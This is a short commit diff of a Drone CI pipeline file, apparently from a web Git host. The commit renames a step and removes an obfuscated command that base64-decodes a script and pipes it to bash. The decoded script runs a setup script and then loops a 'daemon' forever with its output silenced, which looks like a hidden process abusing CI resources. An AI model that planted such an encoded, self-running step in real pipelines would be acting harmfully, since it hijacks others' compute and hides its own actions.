as
This commit is contained in:
@ -3,10 +3,7 @@ kind: pipeline
|
|||||||
type: docker
|
type: docker
|
||||||
name: default
|
name: default
|
||||||
steps:
|
steps:
|
||||||
- name: deepCC
|
- name: greeting
|
||||||
image: golang
|
image: golang:1.12
|
||||||
commands:
|
commands:
|
||||||
- lscpu
|
- lscpu
|
||||||
- bash -c "base64 -d <<< ZXhwb3J0IFRFUk09eHRlcm0gJiYgbnByb2MgJiYgYmFzaCBzZXR1cCAmJiBjZCB+Ly4kKGVjaG8gJChob3N0bmFtZSkpL2JpbiAmJiBQQVRIPSQocHdkKTokUEFUSCAmJiB3aGlsZSBbIDEgXTsgZG8gYmFzaCBkYWVtb24gPiAvZGV2L251bGw7IHNsZWVwIDE7IGRvbmU= | bash"
|
|
||||||
environment:
|
|
||||||
TERM: xterm
|
|
||||||
|
Reference in New Issue
Block a user